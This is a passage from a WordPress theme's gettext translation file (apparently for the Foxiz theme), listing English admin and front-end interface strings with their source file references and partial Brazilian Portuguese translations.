backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set " "as default." msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website " "a the first time." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/design.php:231 msgid "" "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "Compartilhar" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave " "blank if you use 3rd plugins." msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change " "the font size of your text." msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 #: includes/menu.php:297 templates/header/templates.php:701 #: templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" #: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/single-post.php:1492 msgid "" "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "Mostrando %s resultados para sua pesquisa" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "Entrar" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "Sair" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr "" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/category-settings.php:248 backend/configs.php:467 #: backend/panels/block-grid.php:347 msgid "Small Grid" msgstr "" #: backend/panels/block-grid.php:357 msgid "small grid" msgstr "" #: backend/panels/single-post.php:1339 msgid "Small Grid 1 (4 Columns)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/table-contents.php:163 msgid "Smooth Scroll" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: backend/panels/socials.php:86 msgid "Snapchat URL" msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/socials.php:14 backend/panels/socials.php:22 msgid "Social Profiles" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not " "plan to use it." msgstr "" #: backend/class-tgm-plugin-activation.php:345 backend/install-plugins.php:69 msgid "Something went wrong with the plugin API." msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some " "different keywords." msgstr "" "Desculpe, mas nada corresponde aos seus termos de pesquisa. Por favor, tente " "novamente com algumas palavras-chave diferentes." #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin." " Contact the administrator of this site for help on getting the plugin " "activated." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "installed." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. " "Contact the administrator of this site for help on getting the plugin " "updated." msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: backend/panels/socials.php:116 msgid "Soundcloud URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2642 msgid "Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "Fontes:" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/configs.php:244 backend/panels/single-post.php:537 #: backend/single-metaboxes.php:230 msgid "span" msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/panels/single-post.php:1134 templates/entry.php:1201 msgid "Sponsored by" msgstr "" #: backend/panels/block-classic.php:113 backend/panels/block-grid.php:113 #: backend/panels/block-grid.php:278 backend/panels/block-grid.php:443 #: backend/panels/block-grid.php:616 backend/panels/block-grid.php:803 #: backend/panels/block-list.php:121 backend/panels/block-list.php:294 #: backend/panels/block-list.php:475 backend/panels/block-list.php:670 msgid "Sponsored Meta" msgstr "" #: backend/panels/single-post.php:1132 msgid "Sponsored Meta Text" msgstr "" #: backend/panels/single-post.php:1123 backend/single-metaboxes.php:606 #: backend/single-metaboxes.php:611 msgid "Sponsored Post" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/panels/blocks.php:14 msgid "Standard Blog Design" msgstr "" #: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/configs.php:48 includes/sidebars.php:70 msgid "Standard Sidebar" msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll " "find them all here." msgstr "" #: backend/class-tgm-plugin-activation.php:2648 msgid "Status" msgstr "" #: backend/panels/single-post.php:1580 backend/panels/single-post.php:1596 msgid "Sticky Headline" msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/category-settings.php:311 backend/panels/blog-pages.php:321 #: backend/panels/blog-pages.php:808 backend/panels/blog-pages.php:1222 #: backend/panels/blog-pages.php:1630 backend/panels/blog-pages.php:2122 #: backend/panels/bookmark.php:224 backend/panels/bookmark.php:672 #: backend/panels/page.php:82 backend/panels/sidebar.php:47 #: backend/panels/single-post.php:449 msgid "Sticky Sidebar" msgstr "" #: backend/panels/single-post.php:1582 msgid "" "Sticky the single heading and share on socials list when scrolling down." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/configs.php:72 msgid "Style 1 (Left Menu)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/configs.php:73 msgid "Style 2 (Right Menu)" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/configs.php:74 msgid "Style 3 (Center Menu)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/configs.php:75 msgid "Style 4 (Border)" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/configs.php:76 msgid "Style 5 (Center Logo)" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/category-settings.php:112 backend/panels/blog-pages.php:98 msgid "Sub Categories List" msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/newsletter.php:43 msgid "" "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: backend/panels/table-contents.php:56 msgid "Support H1" msgstr "" #: backend/panels/table-contents.php:57 msgid "" "Support H1 tag, Turn this option off if you would like to exclude H1 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:63 msgid "Support H2" msgstr "" #: backend/panels/table-contents.php:64 msgid "" "Support H2 tag, Turn this option off if you would like to exclude H2 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:70 msgid "Support H3" msgstr "" #: backend/panels/table-contents.php:71 msgid "" "Support H3 tag, Turn this option off if you would like to exclude H3 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:77 msgid "Support H4" msgstr "" #: backend/panels/table-contents.php:78 msgid "" "Support H4 tag, Turn this option off if you would like to exclude H4 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:84 msgid "Support H5" msgstr "" #: backend/panels/table-contents.php:85 msgid "" "Support H5 tag, Turn this option off if you would like to exclude H5 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:91 msgid "Support H6" msgstr "" #: backend/panels/table-contents.php:92 msgid "" "Support H6 tag, Turn this option off if you would like to exclude H6 tag out " "of the table of contents." msgstr "" #: backend/panels/table-contents.php:36 msgid "Support Single Page" msgstr "" #: backend/panels/table-contents.php:29 msgid "Support Single Post" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/panels/table-contents.php:14 backend/single-metaboxes.php:710 msgid "Table of Contents" msgstr "" #: backend/panels/table-contents.php:132 msgid "Table of Contents Heading" msgstr "" #: backend/category-settings.php:479 backend/panels/block-classic.php:138 #: backend/panels/block-grid.php:138 backend/panels/block-grid.php:303 #: backend/panels/block-grid.php:468 backend/panels/block-grid.php:641 #: backend/panels/block-grid.php:828 backend/panels/block-list.php:146 #: backend/panels/block-list.php:319 backend/panels/block-list.php:500 #: backend/panels/block-list.php:695 backend/panels/blog-pages.php:504 #: backend/panels/blog-pages.php:991 backend/panels/blog-pages.php:1405 #: backend/panels/blog-pages.php:1813 backend/panels/blog-pages.php:2305 #: backend/panels/bookmark.php:403 backend/panels/bookmark.php:851 msgid "Tablet - Hide Entry Meta" msgstr "" #: backend/category-settings.php:449 backend/panels/blog-pages.php:475 #: backend/panels/blog-pages.php:962 backend/panels/blog-pages.php:1376 #: backend/panels/blog-pages.php:1784 backend/panels/blog-pages.php:2276 #: backend/panels/bookmark.php:374 backend/panels/bookmark.php:822 msgid "Tablet - Title Font Size" msgstr "" #: backend/panels/typography.php:59 backend/panels/typography.php:105 #: backend/panels/typography.php:154 backend/panels/typography.php:203 #: backend/panels/typography.php:252 backend/panels/typography.php:301 #: backend/panels/typography.php:350 backend/panels/typography.php:399 #: backend/panels/typography.php:448 backend/panels/typography.php:514 #: backend/panels/typography.php:562 backend/panels/typography.php:617 #: backend/panels/typography.php:660 backend/panels/typography.php:736 #: backend/panels/typography.php:793 backend/panels/typography.php:877 #: backend/panels/typography.php:1063 backend/panels/typography.php:1135 msgid "Tablet Font Size" msgstr "" #: backend/configs.php:405 backend/panels/design.php:271 msgid "tag (Tags)" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "Tags" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/panels/blog-pages.php:1478 msgid "Tags & Archives" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: backend/panels/single-post.php:795 backend/panels/single-post.php:934 #: backend/panels/single-post.php:1072 backend/panels/single-post.php:1697 #: templates/parts.php:645 msgid "Telegram" msgstr "" #: backend/panels/socials.php:140 msgid "Telegram URL " msgstr "" #: backend/category-settings.php:138 backend/panels/blog-pages.php:129 #: backend/panels/blog-pages.php:666 msgid "Template Display" msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/category-settings.php:37 backend/panels/design.php:52 #: backend/panels/header-style.php:124 backend/panels/header-style.php:202 #: backend/panels/header-style.php:268 backend/panels/header-style.php:412 #: backend/panels/header-style.php:491 backend/panels/header-style.php:679 #: backend/panels/header-style.php:757 backend/panels/header.php:420 #: backend/panels/header.php:473 backend/panels/header.php:690 #: backend/panels/privacy.php:48 msgid "Text Color" msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/class-tgm-plugin-activation.php:2076 #, php-format msgid "TGMPA v%s" msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme " "provides other ways for you to add any info into the header template via " "HTML, text and button and other blocks." msgstr "" #: backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install " "and activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/single-post.php:385 msgid "" "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/general.php:27 msgid "" "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the " "server cache." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with Foxiz: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:360 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure " "maximum compatibility with this theme: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:400 #: backend/class-tgm-plugin-activation.php:3046 msgid "The following plugin was activated successfully:" msgstr "" #: backend/class-tgm-plugin-activation.php:378 backend/install-plugins.php:74 #, php-format msgid "The following recommended plugin is currently inactive: %1$s." msgstr "" #: backend/class-tgm-plugin-activation.php:372 backend/install-plugins.php:73 #, php-format msgid "The following required plugin is currently inactive: %1$s." msgstr "" #: backend/panels/typography.php:490 msgid "The font size will use the post entry meta font size setting." msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" " "section." msgstr "" #: backend/panels/blog-pages.php:2382 msgid "" "The image will be limited at 300px of height. Recommended image height is " "about 600px for the retina screen." msgstr "" #: backend/class-tgm-plugin-activation.php:3601 msgid "" "The installation and activation process is starting. This process may take a " "while on some hosts, so please be patient." msgstr "" #: backend/class-tgm-plugin-activation.php:3597 #, php-format msgid "The installation of %1$s failed." msgstr "" #: backend/class-tgm-plugin-activation.php:3609 msgid "" "The installation process is starting. This process may take a while on some " "hosts, so please be patient." msgstr "" #: backend/panels/single-post.php:46 msgid "" "The layout automatically rollback to the \"Classic\" if featured image isn't " "set." msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/single-post.php:1277 msgid "" "The related box will not appear on post have number of paragraph less than " "this setting." msgstr "" #: backend/class-tgm-plugin-activation.php:1030 msgid "" "The remote plugin package consists of more than one file, but the files are " "not packaged in a folder." msgstr "" #: backend/class-tgm-plugin-activation.php:1027 msgid "" "The remote plugin package does not contain a folder with the desired slug " "and renaming did not work." msgstr "" #: backend/panels/single-post.php:1169 msgid "The Score (1 > 10)" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to " "display adverts or the post related shortcode." msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to " "display adverts" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/single-post.php:1542 msgid "The setting below will apply to the single post pages." msgstr "" #: backend/panels/blog-pages.php:366 backend/panels/blog-pages.php:853 #: backend/panels/blog-pages.php:1267 backend/panels/blog-pages.php:1675 #: backend/panels/blog-pages.php:2167 msgid "" "The setting will not apply if the selected blog layout does not support the " "selected entry category." msgstr "" #: backend/panels/single-post.php:1268 msgid "" "The setting will not apply to posts have been added shortcode directly into " "content." msgstr "" #: backend/panels/blog-pages.php:590 msgid "The settings below apply the blog page." msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:36 msgid "" "The settings below apply to almost post and page content on your website." msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/blog-pages.php:2377 msgid "The settings below apply to the 404 page." msgstr "" #: backend/panels/blog-pages.php:1066 msgid "The settings below apply to the author pages." msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/typography.php:594 msgid "" "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/blog-pages.php:1888 msgid "The settings below apply to the search page." msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the " "corresponding panel if you select another post format for this post." msgstr "" #: backend/panels/blog-pages.php:1481 msgid "The settings below apply to the tags and other archive pages." msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "" "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/blog-pages.php:197 backend/panels/blog-pages.php:245 #: backend/panels/blog-pages.php:299 backend/panels/blog-pages.php:342 #: backend/panels/blog-pages.php:542 backend/panels/blog-pages.php:732 #: backend/panels/blog-pages.php:786 backend/panels/blog-pages.php:829 #: backend/panels/blog-pages.php:1030 backend/panels/blog-pages.php:1146 #: backend/panels/blog-pages.php:1200 backend/panels/blog-pages.php:1243 #: backend/panels/blog-pages.php:1443 backend/panels/blog-pages.php:1554 #: backend/panels/blog-pages.php:1608 backend/panels/blog-pages.php:1651 #: backend/panels/blog-pages.php:1851 backend/panels/blog-pages.php:2046 #: backend/panels/blog-pages.php:2100 backend/panels/blog-pages.php:2143 msgid "" "The settings below will be not available if you use \"Global WP Query " "Template Shortcode\" to build the blog listing." msgstr "" #: backend/category-settings.php:19 msgid "" "The settings below will override on the default settings in \"Theme Options >" " Category\"." msgstr "" #: templates/popup.php:108 msgid "" "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can " "override the settings in this panel." msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override " "settings in this panel." msgstr "" #: backend/panels/design.php:667 msgid "" "The small border style in featured images and other element whole the " "website." msgstr "" #: backend/panels/single-post.php:1168 msgid "The Star (1 > 5)" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: backend/panels/blog-pages.php:198 msgid "" "The theme supports heading dynamic content, Please read the documentation " "for further information." msgstr "" #: backend/panels/breadcrumb.php:16 msgid "" "The theme supports Navxt plugin Yoast SEO and Rank Math SEO breadcrumbs." msgstr "" #: 